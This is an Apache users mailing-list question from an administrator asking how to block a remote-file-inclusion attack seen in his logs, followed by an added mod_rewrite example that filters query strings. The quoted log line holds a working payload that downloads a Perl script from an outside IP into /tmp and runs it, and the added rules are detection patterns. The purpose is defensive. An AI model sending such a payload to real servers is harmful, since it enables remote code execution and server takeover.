[users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch


 



Hello!

Recently, I've found some entries in my Apache webserver log like this:

[IP] - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*? HTTP/1.0" 200 220151 "-" "Mozilla/5.0"

As you can see, some attacker tries to use the index.php file to get a cmd.txt file from another site.

Is there any way to detect these URLs and stop this by configuring Apache?

I've tried with SetEnvIf and RedirectMatch in several ways, with no results:

SetEnvIf Request_URI "(.*)cmd(.*)$" attack

or

RewriteEngine on
RedirectMatch permanent (.*)cmd(.*)$ http://nourl

only works with URLs like:

http://myserver/myfile.php/cmd

not with

http://myserver/myfile.php?cmd

It seems that Request_URI and RedirectMatch don't work with the params in the URL, only with the main URL file.

Thanks.

David
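
The following is an added example, not part of the original message and not configuration from the Apache project. It shows the directives from the post next to a mod_rewrite form that tests the query string. It assumes mod_rewrite is loaded, and the patterns are illustrative and use only POSIX extended regex syntax.

```apache
# Added example (not from the original post).
#
# As posted: both directives are matched against the URL path only.
# The part after "?" is not included, so /myfile.php?cmd never matches.
# RedirectMatch belongs to mod_alias; RewriteEngine has no effect on it.
#
#   SetEnvIf Request_URI "(.*)cmd(.*)$" attack
#   RedirectMatch permanent (.*)cmd(.*)$ http://nourl
#
# Query-string aware form: mod_rewrite exposes the text after "?" as
# %{QUERY_STRING}. Place this in the server config or in the <VirtualHost>
# that serves the site (rewrite rules are not inherited by virtual hosts
# unless RewriteOptions inherit is set there).

RewriteEngine On

# Case 1: any parameter whose value begins with a remote URL, as in
# base_datapath=http://... from the logged request. QUERY_STRING is not
# URL-decoded, so the percent-encoded spelling of "://" is matched too.
RewriteCond %{QUERY_STRING} (^|&)[^=&]*=(https?|ftp)(:|%3a)(/|%2f)(/|%2f) [NC,OR]

# Case 2: a parameter named "cmd", the narrower match the post was
# attempting. Remove this condition if an application on the server
# legitimately uses a parameter with that name.
RewriteCond %{QUERY_STRING} (^|&)cmd= [NC]

# Answer 403 Forbidden. "-" means the URL itself is not rewritten.
RewriteRule .* - [F]
```

Case 1 also rejects legitimate requests that pass a full URL as a parameter value (return-URL parameters, for example), so check the applications on the server before enabling it. Filtering at the web server reduces noise from this request pattern but does not fix the remote-include flaw in the PHP application itself.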



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
  "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx


